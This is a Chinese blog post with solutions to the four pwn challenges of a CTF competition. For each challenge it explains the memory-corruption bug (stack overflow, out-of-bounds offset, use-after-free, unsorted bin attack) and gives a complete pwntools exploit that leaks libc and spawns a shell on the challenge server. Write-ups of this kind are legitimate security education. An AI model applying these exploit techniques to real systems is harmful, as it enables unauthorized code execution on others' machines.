第一届古剑山ctf-pwn全部题解

已于 2023-12-13 15:32:08 修改
阅读量1.1k 收藏 29
点赞数 23
分类专栏: ctf-wp 文章标签: 安全 web安全
于 2023-12-13 14:39:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43784056/article/details/134965641
版权

1. choice

附件:

https://github.com/chounana/ctf/blob/main/2023%E7%AC%AC%E4%B8%80%E5%B1%8A%E5%8F%A4%E5%89%91%E5%B1%B1pwn/choice.zip

漏洞代码:

漏洞成因:

byte_804A04C输入的长度可以覆盖nbytes的值,导致后面输入时存在栈溢出

解法:

覆盖之后就是一个简单的ret2libc的打法了,两个溢出点都可以,但是main函数最后退出的时候不是简单的leave;ret

为了图省事,就直接打sub_804857B的溢出了

exp:

from pwn import *
from LibcSearcher import LibcSearcher
from sys import argv

def ret2libc(leak, func, path=''):
	if path == '':
		libc = LibcSearcher(func, leak)
		base = leak - libc.dump(func)
		system = base + libc.dump('system')
		binsh = base + libc.dump('str_bin_sh')
		free = base + libc.dump('__free_hook')
	else:
		libc = ELF(path)
		base = leak - libc.sym[func]
		system = base + libc.sym['system']
		binsh = base + libc.search(b'/bin/sh').__next__()
		free = base + libc.sym['__free_hook']
	return (system,binsh,free)
s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(delim, str(data))
sa2      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline((data))
sla     = lambda delim,data         :p.sendlineafter(delim, str(data))
sla2     = lambda delim,data         :p.sendlineafter(delim, data)
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
uu64    = lambda data               :u64(data.ljust(8,b'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

context.log_level = 'DEBUG'
binary = './choice'
context.binary = binary
elf = ELF(binary,checksec=False)
p = remote('39.108.173.13',30565) if argv[1]=='r' else process(binary)
#libc = ELF('./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so',checksec=False)

def dbg():
    if argv[1]=='r':
        return
    gdb.attach(p)
    pause()

def itr():
    p.interactive()

puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
# dbg()
sa2(b"Please enter your name:\n",b"\x00"*0x14+b"\xff")
# sla(b"3. Study hard from now",2)
sla(b"3. Study hard from now",2)

payload = b"a" * 0x1c + b"aaaa" + p32(puts_plt) + p32(0x0804857B) + p32(puts_got)
sla2(b"Cool! And whd did you choice it?\n",payload)
ru(b"\n")
puts_real = u32(r(4))
leak("puts_real",puts_real)
system,binsh,free = ret2libc(puts_real,"puts","libc-2.23.so")
payload = b"a" * 0x1c + b"aaaa" + p32(system) + p32(0x0804857B) + p32(binsh)
sla2(b"Cool! And whd did you choice it?\n",payload)
itr()

2. bss2019

附件:

https://github.com/chounana/ctf/blob/main/2023%E7%AC%AC%E4%B8%80%E5%B1%8A%E5%8F%A4%E5%89%91%E5%B1%B1pwn/bss2019.zip

漏洞代码:

漏洞成因:

bss段上存着stdout、stderr和stdin三个指针,由于v1可以输入负数,正好负向最多能够偏移到stdout

解法:

先通过stdout泄露出libc基址,然后通过最开始给出的bss段的地址,可以将stdout覆盖成这个地址

然后printf函数会使用到stdout指向的结构体,修改虚表中的函数为setcontext+61,然后根据调试最后满足所需的条件就行了

exp:

from pwn import *
from LibcSearcher import LibcSearcher
from sys import argv

def ret2libc(leak, func, path=''):
	if path == '':
		libc = LibcSearcher(func, leak)
		base = leak - libc.dump(func)
		system = base + libc.dump('system')
		binsh = base + libc.dump('str_bin_sh')
		free = base + libc.dump('__free_hook')
	else:
		libc = ELF(path)
		base = leak - libc.sym[func]
		system = base + libc.sym['system']
		binsh = base + libc.search(b'/bin/sh').__next__()
		free = base + libc.sym['__free_hook']
	return (system,binsh,free)
s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(delim, str(data))
sa2      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline((data))
sla     = lambda delim,data         :p.sendlineafter(delim, str(data))
sla2     = lambda delim,data         :p.sendlineafter(delim, data)
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
uu64    = lambda data               :u64(data.ljust(8,b'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

context.log_level = 'DEBUG'
binary = './bss2019'
context.binary = binary
elf = ELF(binary,checksec=False)
p = remote('39.108.173.13',30565) if argv[1]=='r' else process(binary)
#libc = ELF('./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so',checksec=False)

def dbg():
    if argv[1]=='r':
        return
    gdb.attach(p)
    pause()

def itr():
    p.interactive()

libc = ELF("./libc-2.23.so")
ru(b"\n")
gifts = int(ru(b"\n"),16)
leak("gifts",gifts)
sla(b"Choice:",1)
sla(b"Offset:\n",-0x40)
ru(b"\n")
stdout = uu64(r(8))
leak("stdout",stdout)
base = stdout -0x3c5620

sla(b"Choice:",2)
sla(b"Offset:\n",0x88)
sla(b"Size:\n",8)
sla2(b"Input data:\n",p64(gifts))

sla(b"Choice:",2)
sla(b"Offset:\n",0xd8)
sla(b"Size:\n",8)
sla2(b"Input data:\n",p64(gifts))

sla(b"Choice:",2)
sla(b"Offset:\n",0x38)
sla(b"Size:\n",8)
sla2(b"Input data:\n",p64(base + libc.sym["setcontext"]+61))

sla(b"Choice:",2)
sla(b"Offset:\n",0xa8)
sla(b"Size:\n",8)
sla2(b"Input data:\n",p64(base + 0x45216))


sla(b"Choice:",2)
sla(b"Offset:\n",-0x40)
sla(b"Size:\n",8)

# dbg()	
sla2(b"Input data:\n",p64(gifts))

itr()

3. uafNote

附件:

https://github.com/chounana/ctf/blob/main/2023%E7%AC%AC%E4%B8%80%E5%B1%8A%E5%8F%A4%E5%89%91%E5%B1%B1pwn/uafNote.zip

漏洞代码:

漏洞成因:

堆块free掉之后数组没有清空

解法:

申请malloc_hook-0x23的fake fastbin chunk,最后修改malloc_hook为one_gadget

exp:

from pwn import *
from LibcSearcher import LibcSearcher
from sys import argv
from Crypto.Util.number import bytes_to_long
import os
# context.terminal = ['tmux','splitw','-h']
def ret2libc(leak, func, path=''):
	if path == '':
		libc = LibcSearcher(func, leak)
		base = leak - libc.dump(func)
		system = base + libc.dump('system')
		binsh = base + libc.dump('str_bin_sh')
		free = base + libc.dump('__free_hook')
	else:
		libc = ELF(path)
		base = leak - libc.sym[func]
		system = base + libc.sym['system']
		binsh = base + libc.search(b'/bin/sh').__next__()
		free = base + libc.sym['__free_hook']
	return (system,binsh,base)
s       = lambda data               :p.send(str(data))
s2       = lambda data               :p.send((data))
sa      = lambda delim,data         :p.sendafter(delim, str(data))
sa2      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline((data))
sla     = lambda delim,data         :p.sendlineafter(delim, str(data))
sla2     = lambda delim,data         :p.sendlineafter(delim, data)
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
uu64    = lambda data               :u64(data.ljust(8,b'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

context.log_level = 'DEBUG'
context.os = 'linux'
context.arch = 'amd64'
binary = './uafNote'
os.system("chmod +x "+binary)
context.binary = binary
elf = ELF(binary,checksec=False)
p = remote("39.108.173.13",38087) if argv[1]=='r' else process(binary)

def dbg():
    if argv[1]=='r':
        return
    gdb.attach(p)
    pause()

def itr():
    p.interactive()
_create,_delete,_show = 1,2,3
menu = ">> "
size_str = "size:"
content_str= "content:"
index_str = "index:"
def create(size,content):
    sla(menu,_create)
    sla(size_str,size)
    sla2(content_str,content)

def delete(index):
    sla(menu,_delete)    
    sla(index_str,index)


def show(index):
    sla(menu,_show)
    sla(index_str,index)

libc = ELF("./libc-2.23.so")
create(0x60,b"a")
create(0x90,b"a")
create(0x60,b"a")
delete(1)
# dbg()
show(1)
libc_base = uu64(ru(b"\n")) - 0x3c3b78
leak("libc_base",libc_base)
system = libc_base + libc.sym['system']
binsh = libc_base + libc.search(b'/bin/sh').__next__()
free = libc_base + libc.sym['__free_hook']
malloc = libc_base + libc.sym['__malloc_hook']
create(0x90,b"a")
delete(0)
delete(2)
delete(0)
create(0x60,p64(malloc-0x23))
create(0x60,b"/bin/sh\x00")
create(0x60,b"/bin/sh\x00")
create(0x60,b"a"*0x13+p64(libc_base+0xf0567))
dbg()
sla(menu,_create)
sla(size_str,0x70)

# delete(5)
itr()

4. fake

附件:

https://github.com/chounana/ctf/blob/main/2023%E7%AC%AC%E4%B8%80%E5%B1%8A%E5%8F%A4%E5%89%91%E5%B1%B1pwn/fake.zip

漏洞代码:

漏洞成因:

堆块free掉数组没有清空

解法:

这题虽然有uaf,但是size限制了只能申请0x1000大小的堆块,并且没有show函数。首先可以通过unsorted bin attack将unsorted bin(av)写入到堆数组中,等会就可以随意修改unsorted bin的fd和bk指针了,从而达到往unsorted bin中链入fake chunk的目的。

然后需要fake chunk要满足的提交,需要有合理的size,并且bk指针的值可写,这点可以利用前面在bss段上输入的passwd进行伪造

又因为它跟堆数组相连

 所以chunk地址伪造成0x6020e8,它的bk正好是heap[0]满足要求,最后申请到bss段上的chunk,就可以修改某一个数组的值为free_got值,然后修改其为puts函数,泄露libc,最后再改成system即可。

上面的合理大小和另外一种思路详见我另外一篇博客的思路三,其实也差不多,就是直接修改bk,不适用unsorted bin attack了,类似于fastbin attack了

tip:这里malloc申请堆块的时候是不会检查地址是否对齐的问题,但是free会。

exp:

from pwn import *
from LibcSearcher import LibcSearcher
from sys import argv
from Crypto.Util.number import bytes_to_long
import os
# context.terminal = ['tmux','splitw','-h']
def ret2libc(leak, func, path=''):
	if path == '':
		libc = LibcSearcher(func, leak)
		base = leak - libc.dump(func)
		system = base + libc.dump('system')
		binsh = base + libc.dump('str_bin_sh')
		free = base + libc.dump('__free_hook')
	else:
		libc = ELF(path)
		base = leak - libc.sym[func]
		system = base + libc.sym['system']
		binsh = base + libc.search(b'/bin/sh').__next__()
		free = base + libc.sym['__free_hook']
	return (system,binsh,base)
s       = lambda data               :p.send(str(data))
s2       = lambda data               :p.send((data))
sa      = lambda delim,data         :p.sendafter(delim, str(data))
sa2      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline((data))
sla     = lambda delim,data         :p.sendlineafter(delim, str(data))
sla2     = lambda delim,data         :p.sendlineafter(delim, data)
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
uu64    = lambda data               :u64(data.ljust(8,b'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

context.log_level = 'DEBUG'
context.os = 'linux'
context.arch = 'amd64'
binary = './fake'
os.system("chmod +x "+binary)
context.binary = binary
elf = ELF(binary,checksec=False)
p = remote("39.108.173.13",38087) if argv[1]=='r' else process(binary)

def dbg():
    if argv[1]=='r':
        return
    gdb.attach(p)
    pause()

def itr():
    p.interactive()
_create,_delete,_edit = 1,3,2
menu = "Your choice:"
content_str= "Content:"
index_str = "Index:"
def create(index,content):
    sla(menu,_create)
    sla(index_str,index)
    sa2(content_str,content)

def delete(index):
    sla(menu,_delete)    
    sla(index_str,index)


def edit(index,content):
    sla(menu,_edit)
    sla(index_str,index)
    s2(content)
sa2(b"Enter your password:\n",p64(0)*2 + p64(0x1011))
create(0, b"a"*0xfff)
create(1, b"a"*0xfff)
create(2, b"a"*0xfff)
create(3, b"a"*0xfff)
create(4, b"a"*0xfff)
delete(3)

edit(3,p64(0) + p64(0x602100-0x10))
create(5, b"a"*0xfff)
# dbg()
edit(0, p64(0)*3+p32(0x6020e8))
create(6, b"a"*8 + p64(elf.got["free"])+p64(elf.got["puts"]))
edit(0, p64(elf.plt["printf"])[:7])
# dbg()
delete(1)

libc = ELF("./libc-2.23.so")
base = uu64(r(6)) - libc.sym["puts"]
leak("base",base)
system = base + libc.sym['system']
edit(5,b"/bin/sh\x00")
edit(0, p64(system)[:7])
delete(5)
# dbg()

itr()

0ne_
关注
  • 23
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF pwn题之虚拟机题型详解
lifanxin的博客
05-24 1481
虚拟机题型详解概述如何分析一个例子总结 概述   随着对pwn题的学习,慢慢开始接触VM虚拟机的pwn题了,刚开始做这种类型的题时会发现代码量比较大,略显复杂,复杂的部分主要是在用程序实现虚拟机指令那里。   其实这种题做法和普通pwn类似,也是寻找漏洞,复杂的地方在于需要我们去分析出虚拟机实现的指令,然后用这些指令操作进行漏洞利用。 如何分析   接下来介绍下如何分析,对于VM类型的pwn题,复杂的地方在于分析出该VM对应实现的指令,那么如何分析需要一定章法。这里需要简单知晓一些计算机组成原理和汇编语言的
BUUCTF PWN 刷题 1-15题
农夫果园好好喝的博客
08-21 2067
经典栈溢出漏洞。
2023SICTF ROUND2 baby_heap
臭nana的博客
09-12 380
就是在申请堆块的时候会先从small bin中找有没有空闲的堆块,其中的bin,是根据main_arena和上申请堆块大小在small bin中的索引得到的,其实也是main_arena+xx,所以可以修改伪造其中有堆块,需要满足victim->bk->fd==victim,所以在堆上伪造就行了,有点像unlink,但是比它简单,最后就是和思路一样了,前面的思路也一样。思路三:在unsorted bin中伪造一个fake chunk,需要满足的条件是。
CTF中的pwn基础题
最新发布
2301_81031055的博客
01-23 812
mprotect 函数用于设置一块内存的保护权限(将从 start 开始、长度为 len 的内存的保护属性修改为 prot 指定的值)elf跟libc是两个单独的文件,elf里的函数想要执行,就得先进入plt表,然后在进入got,got表里的是函数的真实地址。通过观察IDA中左边的函数,发现没有后门函数,也没有system函数考虑使用ret2libc解题。通过调试发现,main函数与后门函数的地址相差一个字节,所以将09打包成一个字节。发现有栈溢出且溢出了一个字节,shift+f12查看发现有后门函数。
攻防世界XCTF-Pwn入门11题解题报告
ailx10
03-15 1496
PwnCTF中至关重要的项目,一般来说都是Linux二进制题目,零基础的同学可以看《程序员的自我修养》,主要题型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。攻防世界XCFT刷题信息汇总如下:攻防世界XCTF黑客笔记刷题记录 ~第一题:level0解题报告:首先看看这个程序是啥呗,哦64位Linux可执行程序:IDA看看逻辑,输出一个hello world然后就...
swpuctf2019 Login pwn详细题解
seaaseesa的博客
12-09 1657
Login 这是swpuctf2019的第二道pwn题,主要考点就是非栈上的字符串格式化漏洞利用。 首先,我们检查一下程序的保护机制 PIE和RELRO没有开启,那么我们可以轻易的利用漏洞修改GOT表 我们用IDA分析一下 在这里,有一个明显的格式化字符串漏洞,由于s1不是在栈上,而是在bss段里,所以漏洞利用起来会比栈上的字符串格式化漏洞稍微繁琐一些。由于外层是一个死循环,所以...
Postman REST Client是一款支持把各种模拟用户HTTP请求的数据发送到服务器的Chrome网页调试插件。
09-12
Postman是一款广受欢迎的RESTful API测试和开发工具,它最初作为一个Chrome浏览器插件而闻名,现在已经发展成为一个独立的应用程序,支持多种操作系统。在本文中,我们将深入探讨Postman的功能、用途及其在IT领域的...
綦江怎么读_綦,拼音_綦,意思是什么
08-19
该地区有丰富的自然景观和人文资源,如古剑山、丁山湖、白云观、古树化石群等旅游景点,其中古剑山是国家4A级旅游景区,拥有高森林覆盖率和优质的空气环境,被誉为天然氧吧。 此外,綦江区内的东溪古镇是一个历史...
矽钛合金耐磨地坪工程施工设计方案.pdf.doc
10-04
现场管理由项目经理缪剑山领导,包括项目副经理、项目总工、深化设计、施工员、安全员、质检员、预算员、材料员和资料员等多个岗位,确保施工过程的高效和有序。 4. **施工准备** - 成立了以工程负责人为首的施工...
《推背图》全文——金圣叹注解版.doc
11-18
第一象:甲子(开篇论循环) 谶曰:“茫茫天地,不知所止;日月循环,周而复始。”颂曰:“自从盘古迄希夷虎斗龙争事正奇悟得循环真谛在试於唐後论元机。”金圣叹注解:“此象古今治乱相因,如日月往来,阴阳递嬗,...
插花及盆景考题AB附答案.doc
10-07
插花及盆景艺术是一种融合了自然美与人文创意的技艺,它涵盖了多个方面的知识,如艺术风格、历史背景、技巧方法以及植物象征意义等。本文将深入解析这些知识点。 插花艺术起源于古代,拥有丰富的历史底蕴。明代时,...
插花基础知识PPT学习教案.pptx
10-08
剑山是一种常见的插花器,通常由重金属如锡、铅、铜制成,基座上的铜针可以固定和支撑花材,确保其稳定并能吸收水分。在浅盆中插花时,剑山是不可或缺的。花泥则是一种吸水海绵,常用于花篮和宽口浅身花器中,既能...
餐厨垃圾厌氧消化及综合利用技术借鉴.pdf
11-13
《餐厨垃圾厌氧消化及综合利用技术》一文由沈剑山、颜晓英和蒋宏华三位专家共同撰写,出自康达新能源科技有限公司。该文章深入探讨了餐厨垃圾处理的重要技术和方法,重点关注了厌氧消化技术在餐厨垃圾处理中的应用...
浅谈艺术插花的制作.pdf
12-25
门艺术,更是一种情感与审美的表达方式。无论是东方的含蓄内敛,西方的热烈奔放,还是自由式的随性挥洒,每一种风格都有其独特的魅力和创作技巧。在艺术插花的实践中,首先需要对花材进行精细的处理,这包括修剪枝条...
用c语言实现电话簿的编写
08-25
在本文中,我们将深入探讨如何使用C语言来实现一个简单的电话簿系统。C语言是一种强大的、底层的编程语言,常用于开发系统软件、嵌入式系统以及各种实用工具。电话簿程序是一个常见的学习项目,它可以帮助初学者理解...
CTF | CTF比赛题解分享
hackzkaq的博客
10-09 7322
前言:由于此次比赛的题目较多,所以这是这个比赛的第一篇wp,共20题,先记录一下,防止忘记。里面有些题目是新手题较为简单,但也有许多有意思的题目,真的是做的过程痛不欲生,做完才感觉到酣畅淋漓,废话不多说,开写。接下来就可以定位了。1.这次显示文件是个jpg格式的图片,但是打不开,16进制编辑器打开,看到文件头出现了IHDR头,就可以想到其实是个png格式的图片,再看到文件尾,更加证实了是个png文件。4.第三张照片是最头疼的,全都是高楼,能够看到的只有广西农信,时代丽都,搜索相关位置,找到了大概区域。
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至。
07-29 1476
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
[wp]“古剑山第一届全国大学生网络攻防大赛 Web部分wp
m0_63138919的博客
12-08 1549
我是菜鸡 记录学习过程 比赛说是原题杯 但我比赛打的少 记录下来
buuctf——pwn刷题之旅(持续更新)
qq_42988973的博客
12-16 405
buuctf-pwn 的一些wp
ctf pwn 计算器
10-05
引用是一段代码,它使用了Python的pwn库来进行CTF中的pwn攻击。pwn攻击是指通过分析程序本身的漏洞,编写利用脚本来获取主机权限。这种攻击需要对程序进行深入分析,了解操作系统的特性和相关漏洞。因此,CTF pwn攻击是一个相对较难的领域。 对于你提到的"计算器",如果你是指CTF中的pwn题目中的一个计算器程序,那么你需要先进行程序的分析,找到可能存在的漏洞点。一旦找到漏洞点,你可以通过构造特定输入来利用漏洞,从而获取权限。 在学习CTF pwn攻击时,首先要有扎实的基础知识,包括C语言、汇编语言、Python编程、操作系统原理和Linux操作等方面的知识。这些基础知识将为你提供分析和理解程序的能力。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值